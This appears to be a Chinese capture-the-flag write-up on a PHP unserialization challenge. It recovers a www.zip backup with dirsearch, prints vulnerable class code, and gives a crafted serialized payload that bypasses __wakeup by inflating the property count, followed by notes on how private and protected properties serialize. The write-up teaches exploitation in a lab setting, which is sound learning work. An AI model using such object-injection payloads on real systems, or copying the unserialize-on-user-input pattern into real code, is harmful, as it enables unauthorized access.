知识点:PHP序列化与反序列化,最下方有几个扩展可以看一下

他说备份了,就肯定扫目录,把源文件备份扫出来

dirsearch扫目录扫到www.zip压缩包

 

然后解压发现是,序列化。

具体特征如下:

index.php包含如下代码:接收参数,进行序列化

  <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
  ?>

class.php含: 源码都放在着

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
         
        }
    }
}
?>

开始构造

声明一个Name类,包含username,password,且两个变量都是private修饰,整句话都有用。

然后根据判断句得知,username必须是admin,password必须是100所以,构造序列化

O是对象,s是字符串,i是数字

因为是private修饰的所以要加%00充当空格

构造:O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

payload:url+?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

下面是拓展+答疑:

我看大佬的payload的时候,很疑惑为什么要写%00Name%00username这样的形式?

然后我进行了三种修饰方式的测试:public,protected,private

我忽然明白:

只有public修饰的不用太多的修饰原生态构造就好,而private需要加%00Name%00

protected则需要使用     %00*%00username这样的方式

protected修饰变量,运行后回显代码内注释内容

<?php
class Name{
	protected $username = 'nonono';////////////////看这两行
	protected $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//看这看这看这看这!!!!!!!!!
//运行会输出 O:4:"Name":2:{s:11:" * username";s:5:"admin";s:11:" * password";i:100;}
?>

 

public修饰变量,运行后回显代码内注释内容

<?php
class Name{
	public $username = 'nonono';
	public $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
?>

 private修饰变量,运行后回显代码内注释内容

<?php
class Name{
	private $username = 'nonono';
	private $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
?>